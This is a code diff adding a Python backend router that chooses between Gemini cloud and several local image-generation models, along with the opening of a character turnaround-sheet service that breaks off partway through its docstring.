|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Backend Router
|
| 3 |
+
==============
|
| 4 |
+
|
| 5 |
+
Unified router for selecting between different image generation backends:
|
| 6 |
+
- Gemini (Flash/Pro) - Cloud API
|
| 7 |
+
- FLUX.2 klein 4B/9B - Local model
|
| 8 |
+
- Z-Image Turbo (Tongyi-MAI) - Local model, 6B, 9 steps, 16GB VRAM
|
| 9 |
+
- Qwen-Image-Edit-2511 - Local model
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import logging
|
| 13 |
+
from typing import Optional, Protocol, Union
|
| 14 |
+
from enum import Enum, auto
|
| 15 |
+
from PIL import Image
|
| 16 |
+
|
| 17 |
+
from .models import GenerationRequest, GenerationResult
|
| 18 |
+
|
| 19 |
+
|
| 20 |
+
logger = logging.getLogger(__name__)
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
class BackendType(Enum):
|
| 24 |
+
"""Available backend types."""
|
| 25 |
+
GEMINI_FLASH = "gemini_flash"
|
| 26 |
+
GEMINI_PRO = "gemini_pro"
|
| 27 |
+
FLUX_KLEIN = "flux_klein" # 4B model (~13GB VRAM)
|
| 28 |
+
FLUX_KLEIN_9B_FP8 = "flux_klein_9b_fp8" # 9B FP8 model (~20GB VRAM, best quality)
|
| 29 |
+
ZIMAGE_TURBO = "zimage_turbo" # Z-Image Turbo 6B (9 steps, 16GB VRAM)
|
| 30 |
+
ZIMAGE_BASE = "zimage_base" # Z-Image Base 6B (50 steps, CFG support) - NEW!
|
| 31 |
+
LONGCAT_EDIT = "longcat_edit" # LongCat-Image-Edit (instruction-following, 18GB)
|
| 32 |
+
QWEN_IMAGE_EDIT = "qwen_image_edit" # Direct diffusers (slow, high VRAM)
|
| 33 |
+
QWEN_COMFYUI = "qwen_comfyui" # Via ComfyUI with FP8 quantization
|
| 34 |
+
|
| 35 |
+
|
| 36 |
+
class ImageClient(Protocol):
|
| 37 |
+
"""Protocol for image generation clients."""
|
| 38 |
+
|
| 39 |
+
def generate(self, request: GenerationRequest, **kwargs) -> GenerationResult:
|
| 40 |
+
"""Generate an image from request."""
|
| 41 |
+
...
|
| 42 |
+
|
| 43 |
+
def is_healthy(self) -> bool:
|
| 44 |
+
"""Check if client is ready."""
|
| 45 |
+
...
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
class BackendRouter:
|
| 49 |
+
"""
|
| 50 |
+
Router for selecting between image generation backends.
|
| 51 |
+
|
| 52 |
+
Supports lazy loading of local models to save memory.
|
| 53 |
+
"""
|
| 54 |
+
|
| 55 |
+
BACKEND_NAMES = {
|
| 56 |
+
BackendType.GEMINI_FLASH: "Gemini Flash",
|
| 57 |
+
BackendType.GEMINI_PRO: "Gemini Pro",
|
| 58 |
+
BackendType.FLUX_KLEIN: "FLUX.2 klein 4B",
|
| 59 |
+
BackendType.FLUX_KLEIN_9B_FP8: "FLUX.2 klein 9B-FP8",
|
| 60 |
+
BackendType.ZIMAGE_TURBO: "Z-Image Turbo 6B",
|
| 61 |
+
BackendType.ZIMAGE_BASE: "Z-Image Base 6B",
|
| 62 |
+
BackendType.LONGCAT_EDIT: "LongCat-Image-Edit",
|
| 63 |
+
BackendType.QWEN_IMAGE_EDIT: "Qwen-Image-Edit-2511",
|
| 64 |
+
BackendType.QWEN_COMFYUI: "Qwen-Image-Edit-2511-FP8 (ComfyUI)",
|
| 65 |
+
}
|
| 66 |
+
|
| 67 |
+
def __init__(
|
| 68 |
+
self,
|
| 69 |
+
gemini_api_key: Optional[str] = None,
|
| 70 |
+
default_backend: BackendType = BackendType.GEMINI_FLASH
|
| 71 |
+
):
|
| 72 |
+
"""
|
| 73 |
+
Initialize backend router.
|
| 74 |
+
|
| 75 |
+
Args:
|
| 76 |
+
gemini_api_key: API key for Gemini backends
|
| 77 |
+
default_backend: Default backend to use
|
| 78 |
+
"""
|
| 79 |
+
self.gemini_api_key = gemini_api_key
|
| 80 |
+
self.default_backend = default_backend
|
| 81 |
+
self._clients: dict = {}
|
| 82 |
+
self._active_backend: Optional[BackendType] = None
|
| 83 |
+
|
| 84 |
+
logger.info(f"BackendRouter initialized (default: {default_backend.value})")
|
| 85 |
+
|
| 86 |
+
def get_client(self, backend: Optional[BackendType] = None) -> ImageClient:
|
| 87 |
+
"""
|
| 88 |
+
Get or create client for specified backend.
|
| 89 |
+
|
| 90 |
+
Args:
|
| 91 |
+
backend: Backend type (uses default if None)
|
| 92 |
+
|
| 93 |
+
Returns:
|
| 94 |
+
ImageClient instance
|
| 95 |
+
"""
|
| 96 |
+
if backend is None:
|
| 97 |
+
backend = self.default_backend
|
| 98 |
+
|
| 99 |
+
# Return cached client if available
|
| 100 |
+
if backend in self._clients:
|
| 101 |
+
self._active_backend = backend
|
| 102 |
+
return self._clients[backend]
|
| 103 |
+
|
| 104 |
+
# Create new client
|
| 105 |
+
client = self._create_client(backend)
|
| 106 |
+
self._clients[backend] = client
|
| 107 |
+
self._active_backend = backend
|
| 108 |
+
|
| 109 |
+
return client
|
| 110 |
+
|
| 111 |
+
def _create_client(self, backend: BackendType) -> ImageClient:
|
| 112 |
+
"""Create client for specified backend."""
|
| 113 |
+
logger.info(f"Creating client for {backend.value}...")
|
| 114 |
+
|
| 115 |
+
if backend == BackendType.GEMINI_FLASH:
|
| 116 |
+
from .gemini_client import GeminiClient
|
| 117 |
+
if not self.gemini_api_key:
|
| 118 |
+
raise ValueError("Gemini API key required for Gemini backends")
|
| 119 |
+
return GeminiClient(api_key=self.gemini_api_key, use_pro_model=False)
|
| 120 |
+
|
| 121 |
+
elif backend == BackendType.GEMINI_PRO:
|
| 122 |
+
from .gemini_client import GeminiClient
|
| 123 |
+
if not self.gemini_api_key:
|
| 124 |
+
raise ValueError("Gemini API key required for Gemini backends")
|
| 125 |
+
return GeminiClient(api_key=self.gemini_api_key, use_pro_model=True)
|
| 126 |
+
|
| 127 |
+
elif backend == BackendType.FLUX_KLEIN:
|
| 128 |
+
from .flux_klein_client import FluxKleinClient
|
| 129 |
+
# 4B model (~13GB VRAM) - fast
|
| 130 |
+
client = FluxKleinClient(
|
| 131 |
+
model_variant="4b",
|
| 132 |
+
enable_cpu_offload=False
|
| 133 |
+
)
|
| 134 |
+
if not client.load_model():
|
| 135 |
+
raise RuntimeError("Failed to load FLUX.2 klein 4B model")
|
| 136 |
+
return client
|
| 137 |
+
|
| 138 |
+
elif backend == BackendType.FLUX_KLEIN_9B_FP8:
|
| 139 |
+
from .flux_klein_client import FluxKleinClient
|
| 140 |
+
# 9B model (~29GB VRAM with CPU offload) - best quality
|
| 141 |
+
client = FluxKleinClient(
|
| 142 |
+
model_variant="9b",
|
| 143 |
+
enable_cpu_offload=True # Required for 24GB VRAM
|
| 144 |
+
)
|
| 145 |
+
if not client.load_model():
|
| 146 |
+
raise RuntimeError("Failed to load FLUX.2 klein 9B model")
|
| 147 |
+
return client
|
| 148 |
+
|
| 149 |
+
elif backend == BackendType.ZIMAGE_TURBO:
|
| 150 |
+
from .zimage_client import ZImageClient
|
| 151 |
+
# Z-Image Turbo 6B - fast (9 steps), fits 16GB VRAM
|
| 152 |
+
client = ZImageClient(
|
| 153 |
+
model_variant="turbo",
|
| 154 |
+
enable_cpu_offload=True
|
| 155 |
+
)
|
| 156 |
+
if not client.load_model():
|
| 157 |
+
raise RuntimeError("Failed to load Z-Image Turbo model")
|
| 158 |
+
return client
|
| 159 |
+
|
| 160 |
+
elif backend == BackendType.ZIMAGE_BASE:
|
| 161 |
+
from .zimage_client import ZImageClient
|
| 162 |
+
# Z-Image Base 6B - quality (50 steps), CFG support, negative prompts
|
| 163 |
+
client = ZImageClient(
|
| 164 |
+
model_variant="base",
|
| 165 |
+
enable_cpu_offload=True
|
| 166 |
+
)
|
| 167 |
+
if not client.load_model():
|
| 168 |
+
raise RuntimeError("Failed to load Z-Image Base model")
|
| 169 |
+
return client
|
| 170 |
+
|
| 171 |
+
elif backend == BackendType.LONGCAT_EDIT:
|
| 172 |
+
from .longcat_edit_client import LongCatEditClient
|
| 173 |
+
# LongCat-Image-Edit - instruction-following editing (~18GB VRAM)
|
| 174 |
+
client = LongCatEditClient(
|
| 175 |
+
enable_cpu_offload=True
|
| 176 |
+
)
|
| 177 |
+
if not client.load_model():
|
| 178 |
+
raise RuntimeError("Failed to load LongCat-Image-Edit model")
|
| 179 |
+
return client
|
| 180 |
+
|
| 181 |
+
elif backend == BackendType.QWEN_IMAGE_EDIT:
|
| 182 |
+
from .qwen_image_edit_client import QwenImageEditClient
|
| 183 |
+
client = QwenImageEditClient(enable_cpu_offload=False)
|
| 184 |
+
if not client.load_model():
|
| 185 |
+
raise RuntimeError("Failed to load Qwen-Image-Edit model")
|
| 186 |
+
return client
|
| 187 |
+
|
| 188 |
+
elif backend == BackendType.QWEN_COMFYUI:
|
| 189 |
+
from .comfyui_client import ComfyUIClient
|
| 190 |
+
client = ComfyUIClient()
|
| 191 |
+
if not client.is_healthy():
|
| 192 |
+
raise RuntimeError(
|
| 193 |
+
"ComfyUI is not running. Please start ComfyUI first:\n"
|
| 194 |
+
" cd comfyui && python main.py"
|
| 195 |
+
)
|
| 196 |
+
return client
|
| 197 |
+
|
| 198 |
+
else:
|
| 199 |
+
raise ValueError(f"Unknown backend: {backend}")
|
| 200 |
+
|
| 201 |
+
def generate(
|
| 202 |
+
self,
|
| 203 |
+
request: GenerationRequest,
|
| 204 |
+
backend: Optional[BackendType] = None,
|
| 205 |
+
**kwargs
|
| 206 |
+
) -> GenerationResult:
|
| 207 |
+
"""
|
| 208 |
+
Generate image using specified backend.
|
| 209 |
+
|
| 210 |
+
Args:
|
| 211 |
+
request: Generation request
|
| 212 |
+
backend: Backend to use (default if None)
|
| 213 |
+
**kwargs: Backend-specific parameters
|
| 214 |
+
|
| 215 |
+
Returns:
|
| 216 |
+
GenerationResult
|
| 217 |
+
"""
|
| 218 |
+
try:
|
| 219 |
+
client = self.get_client(backend)
|
| 220 |
+
return client.generate(request, **kwargs)
|
| 221 |
+
except Exception as e:
|
| 222 |
+
logger.error(f"Generation failed with {backend}: {e}", exc_info=True)
|
| 223 |
+
return GenerationResult.error_result(f"Backend error: {str(e)}")
|
| 224 |
+
|
| 225 |
+
def unload_local_models(self):
|
| 226 |
+
"""Unload all local models to free memory."""
|
| 227 |
+
local_backends = (BackendType.FLUX_KLEIN, BackendType.FLUX_KLEIN_9B_FP8, BackendType.ZIMAGE_TURBO, BackendType.ZIMAGE_BASE, BackendType.LONGCAT_EDIT, BackendType.QWEN_IMAGE_EDIT, BackendType.QWEN_COMFYUI)
|
| 228 |
+
for backend, client in list(self._clients.items()):
|
| 229 |
+
if backend in local_backends:
|
| 230 |
+
if hasattr(client, 'unload_model'):
|
| 231 |
+
client.unload_model()
|
| 232 |
+
del self._clients[backend]
|
| 233 |
+
logger.info(f"Unloaded {backend.value}")
|
| 234 |
+
|
| 235 |
+
def switch_backend(self, backend: BackendType) -> bool:
|
| 236 |
+
"""
|
| 237 |
+
Switch to a different backend.
|
| 238 |
+
|
| 239 |
+
For local models, this will load the new model and optionally
|
| 240 |
+
unload the previous one to save memory.
|
| 241 |
+
|
| 242 |
+
Args:
|
| 243 |
+
backend: Backend to switch to
|
| 244 |
+
|
| 245 |
+
Returns:
|
| 246 |
+
True if switch successful
|
| 247 |
+
"""
|
| 248 |
+
try:
|
| 249 |
+
local_backends = {BackendType.FLUX_KLEIN, BackendType.FLUX_KLEIN_9B_FP8, BackendType.ZIMAGE_TURBO, BackendType.ZIMAGE_BASE, BackendType.LONGCAT_EDIT, BackendType.QWEN_IMAGE_EDIT, BackendType.QWEN_COMFYUI}
|
| 250 |
+
|
| 251 |
+
# Unload other local models first to save memory
|
| 252 |
+
if backend in local_backends:
|
| 253 |
+
for other_local in local_backends - {backend}:
|
| 254 |
+
if other_local in self._clients:
|
| 255 |
+
if hasattr(self._clients[other_local], 'unload_model'):
|
| 256 |
+
self._clients[other_local].unload_model()
|
| 257 |
+
del self._clients[other_local]
|
| 258 |
+
|
| 259 |
+
# Get/create the new client
|
| 260 |
+
self.get_client(backend)
|
| 261 |
+
self.default_backend = backend
|
| 262 |
+
|
| 263 |
+
logger.info(f"Switched to {backend.value}")
|
| 264 |
+
return True
|
| 265 |
+
|
| 266 |
+
except Exception as e:
|
| 267 |
+
logger.error(f"Failed to switch to {backend}: {e}", exc_info=True)
|
| 268 |
+
return False
|
| 269 |
+
|
| 270 |
+
def get_active_backend_name(self) -> str:
|
| 271 |
+
"""Get human-readable name of active backend."""
|
| 272 |
+
if self._active_backend:
|
| 273 |
+
return self.BACKEND_NAMES.get(self._active_backend, str(self._active_backend))
|
| 274 |
+
return "None"
|
| 275 |
+
|
| 276 |
+
def is_local_backend(self, backend: Optional[BackendType] = None) -> bool:
|
| 277 |
+
"""Check if backend is a local model."""
|
| 278 |
+
if backend is None:
|
| 279 |
+
backend = self._active_backend
|
| 280 |
+
return backend in (BackendType.FLUX_KLEIN, BackendType.FLUX_KLEIN_9B_FP8, BackendType.ZIMAGE_TURBO, BackendType.ZIMAGE_BASE, BackendType.LONGCAT_EDIT, BackendType.QWEN_IMAGE_EDIT, BackendType.QWEN_COMFYUI)
|
| 281 |
+
|
| 282 |
+
@staticmethod
|
| 283 |
+
def get_supported_aspect_ratios(backend: BackendType) -> dict:
|
| 284 |
+
"""
|
| 285 |
+
Get supported aspect ratios for a backend.
|
| 286 |
+
|
| 287 |
+
Returns dict mapping ratio strings to (width, height) tuples.
|
| 288 |
+
"""
|
| 289 |
+
# Import clients to get their ASPECT_RATIOS
|
| 290 |
+
if backend in (BackendType.FLUX_KLEIN, BackendType.FLUX_KLEIN_9B_FP8):
|
| 291 |
+
from .flux_klein_client import FluxKleinClient
|
| 292 |
+
return FluxKleinClient.ASPECT_RATIOS
|
| 293 |
+
|
| 294 |
+
elif backend in (BackendType.ZIMAGE_TURBO, BackendType.ZIMAGE_BASE):
|
| 295 |
+
from .zimage_client import ZImageClient
|
| 296 |
+
return ZImageClient.ASPECT_RATIOS
|
| 297 |
+
|
| 298 |
+
elif backend == BackendType.LONGCAT_EDIT:
|
| 299 |
+
from .longcat_edit_client import LongCatEditClient
|
| 300 |
+
return LongCatEditClient.ASPECT_RATIOS
|
| 301 |
+
|
| 302 |
+
elif backend in (BackendType.GEMINI_FLASH, BackendType.GEMINI_PRO):
|
| 303 |
+
from .gemini_client import GeminiClient
|
| 304 |
+
return GeminiClient.ASPECT_RATIOS
|
| 305 |
+
|
| 306 |
+
elif backend == BackendType.QWEN_IMAGE_EDIT:
|
| 307 |
+
from .qwen_image_edit_client import QwenImageEditClient
|
| 308 |
+
return QwenImageEditClient.ASPECT_RATIOS
|
| 309 |
+
|
| 310 |
+
elif backend == BackendType.QWEN_COMFYUI:
|
| 311 |
+
from .comfyui_client import ComfyUIClient
|
| 312 |
+
return ComfyUIClient.ASPECT_RATIOS
|
| 313 |
+
|
| 314 |
+
else:
|
| 315 |
+
# Default fallback
|
| 316 |
+
return {
|
| 317 |
+
"1:1": (1024, 1024),
|
| 318 |
+
"16:9": (1344, 768),
|
| 319 |
+
"9:16": (768, 1344),
|
| 320 |
+
}
|
| 321 |
+
|
| 322 |
+
@staticmethod
|
| 323 |
+
def get_aspect_ratio_choices(backend: BackendType) -> list:
|
| 324 |
+
"""
|
| 325 |
+
Get aspect ratio choices for UI dropdowns.
|
| 326 |
+
|
| 327 |
+
Returns list of (label, value) tuples.
|
| 328 |
+
"""
|
| 329 |
+
ratios = BackendRouter.get_supported_aspect_ratios(backend)
|
| 330 |
+
choices = []
|
| 331 |
+
for ratio, (w, h) in ratios.items():
|
| 332 |
+
label = f"{ratio} ({w}x{h})"
|
| 333 |
+
choices.append((label, ratio))
|
| 334 |
+
return choices
|
| 335 |
+
|
| 336 |
+
def get_available_backends(self) -> list:
|
| 337 |
+
"""Get list of available backends."""
|
| 338 |
+
available = []
|
| 339 |
+
|
| 340 |
+
# Gemini backends require API key
|
| 341 |
+
if self.gemini_api_key:
|
| 342 |
+
available.extend([BackendType.GEMINI_FLASH, BackendType.GEMINI_PRO])
|
| 343 |
+
|
| 344 |
+
# Local backends always available (if dependencies installed)
|
| 345 |
+
try:
|
| 346 |
+
from diffusers import Flux2KleinPipeline
|
| 347 |
+
available.append(BackendType.FLUX_KLEIN)
|
| 348 |
+
except ImportError:
|
| 349 |
+
pass
|
| 350 |
+
|
| 351 |
+
try:
|
| 352 |
+
from diffusers import ZImagePipeline
|
| 353 |
+
available.append(BackendType.ZIMAGE_TURBO)
|
| 354 |
+
available.append(BackendType.ZIMAGE_BASE)
|
| 355 |
+
except ImportError:
|
| 356 |
+
pass
|
| 357 |
+
|
| 358 |
+
try:
|
| 359 |
+
from diffusers import LongCatImageEditPipeline
|
| 360 |
+
available.append(BackendType.LONGCAT_EDIT)
|
| 361 |
+
except ImportError:
|
| 362 |
+
pass
|
| 363 |
+
|
| 364 |
+
try:
|
| 365 |
+
from diffusers import QwenImageEditPlusPipeline
|
| 366 |
+
available.append(BackendType.QWEN_IMAGE_EDIT)
|
| 367 |
+
except ImportError:
|
| 368 |
+
pass
|
| 369 |
+
|
| 370 |
+
# ComfyUI backend - check if ComfyUI client works
|
| 371 |
+
try:
|
| 372 |
+
from .comfyui_client import ComfyUIClient
|
| 373 |
+
client = ComfyUIClient()
|
| 374 |
+
if client.is_healthy():
|
| 375 |
+
available.append(BackendType.QWEN_COMFYUI)
|
| 376 |
+
except Exception:
|
| 377 |
+
pass
|
| 378 |
+
|
| 379 |
+
return available
|
| 380 |
+
|
| 381 |
+
@staticmethod
|
| 382 |
+
def get_backend_choices() -> list:
|
| 383 |
+
"""Get list of backend choices for UI dropdowns."""
|
| 384 |
+
return [
|
| 385 |
+
("Gemini Flash (Cloud)", BackendType.GEMINI_FLASH.value),
|
| 386 |
+
("Gemini Pro (Cloud)", BackendType.GEMINI_PRO.value),
|
| 387 |
+
("FLUX.2 klein 4B (Local)", BackendType.FLUX_KLEIN.value),
|
| 388 |
+
("Z-Image Turbo 6B (Fast, 9 steps, 16GB)", BackendType.ZIMAGE_TURBO.value),
|
| 389 |
+
("Z-Image Base 6B (Quality, 50 steps, CFG)", BackendType.ZIMAGE_BASE.value),
|
| 390 |
+
("LongCat-Image-Edit (Instruction Editing, 18GB)", BackendType.LONGCAT_EDIT.value),
|
| 391 |
+
("Qwen-Image-Edit-2511 (Local, High VRAM)", BackendType.QWEN_IMAGE_EDIT.value),
|
| 392 |
+
("Qwen-Image-Edit-2511-FP8 (ComfyUI)", BackendType.QWEN_COMFYUI.value),
|
| 393 |
+
]
|
| 394 |
+
|
| 395 |
+
@staticmethod
|
| 396 |
+
def backend_from_string(value: str) -> BackendType:
|
| 397 |
+
"""Convert string to BackendType."""
|
| 398 |
+
for bt in BackendType:
|
| 399 |
+
if bt.value == value:
|
| 400 |
+
return bt
|
| 401 |
+
raise ValueError(f"Unknown backend: {value}")
|
src/character_service.py
ADDED
|
@@ -0,0 +1,709 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Character Sheet Service
|
| 3 |
+
=======================
|
| 4 |
+
|
| 5 |
+
9-stage pipeline for generating 7-view character turnaround sheets.
|
| 6 |
+
|
| 7 |
+
Layout:
|
| 8 |
+
+------------------+------------------+------------------+
|
| 9 |
+
| Left Face Profile| Front Face | Right Face Profile| (3:4)
|
| 10 |
+
+------------------+------------------+------------------+
|
| 11 |
+
| Left Side Body | Front Body | Right Side Body | Back Body | (9:16)
|
| 12 |
+
+------------------+------------------+------------------+
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import time
|
| 16 |
+
import random
|
| 17 |
+
import logging
|
| 18 |
+
from pathlib import Path
|
| 19 |
+
from typing import Optional, Tuple, Dict, Any, Callable, List
|
| 20 |
+
from datetime import datetime
|
| 21 |
+
from PIL import Image
|
| 22 |
+
|
| 23 |
+
from .models import (
|
| 24 |
+
GenerationRequest,
|
| 25 |
+
GenerationResult,
|
| 26 |
+
CharacterSheetConfig,
|
| 27 |
+
CharacterSheetMetadata
|
| 28 |
+
)
|
| 29 |
+
from .gemini_client import GeminiClient
|
| 30 |
+
from .backend_router import BackendRouter, BackendType
|
| 31 |
+
from .utils import ensure_pil_image, save_image, sanitize_filename, preprocess_images_for_backend
|
| 32 |
+
|
| 33 |
+
|
| 34 |
+
logger = logging.getLogger(__name__)
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
class CharacterSheetService:
|
| 38 |
+
"""
|
| 39 |
+
Service for generating 7-view character turnaround sheets.
|
| 40 |
+
|
| 41 |
+
Pipeline (9 stages):
|
| 42 |
+
0. Input normalization (face→body or body→face+body)
|
| 43 |
+
1. Front face portrait
|
| 44 |
+
2. Left face profile (90 degrees)
|
| 45 |
+
3. Right face profile (90 degrees)
|
| 46 |
+
4. Front full body (from normalized)
|
| 47 |
+
5. Back full body
|
| 48 |
+
6. Left side full body
|
| 49 |
+
